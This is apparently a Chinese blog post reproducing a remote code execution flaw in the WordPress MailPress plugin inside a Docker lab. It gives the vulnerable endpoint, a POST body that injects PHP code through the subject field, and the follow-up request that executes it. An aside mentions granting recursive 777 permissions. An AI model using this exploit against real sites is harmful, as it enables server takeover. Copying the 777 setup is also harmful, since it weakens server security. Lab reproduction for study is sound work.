WordPress-Mailpress远程代码执行漏洞复现

插件简介:

Mailpress是一个比较流行的邮件插件。

插件下载Plugin Directory:https://wordpress.org/plugins/mailpress/

漏洞复现:

漏洞详解地址:https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

Docker镜像地址:

docker pull medicean/vulapps:w_wordpress_2

启动环境

docker run -d -p 8000:80 medicean/vulapps:w_wordpress_2

PoC 使用

使用攻击代码触发漏洞

http://你的 IP 地址:端口号/wp-content/plugins/mailpress/mp-includes/action.php

首先访问这个这个链接:

 

抓取上面那个页面的数据包并修改请求方式为post,并且加上如下post请求参数:

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

返回包里的id记下來

然后访问下面链接:

127.0.0.1:8000/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=6

 

复现成功!!!

修复方式:

及时打上官方补丁

PS:(一开始我是使用自己搭建的Wordpress,然后自己下载插件了按照正常安装流程走【正常流程:下载插件压缩包-->打开后台-->选择插件-->上传压缩包-->选择安装-->安装】,但是我出现了如下几个问题:1:上传文件大小限制(修改php.ini文件中的上传文件大小限制)2:目录读写的问题(给wordpress所在的目录的父母了递归777权限)3:上传成功,开始安装后出现输入FTP账号密码(到这我没弄了),4:我解压插件压缩包后,直接放到wordpress的插件文件内,刷新页面后,点击激活该插件时,出现一堆错误。我就放弃了,使用docker一键搭建。所以我推荐使用docker,没事儿多玩玩docker!!!)

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值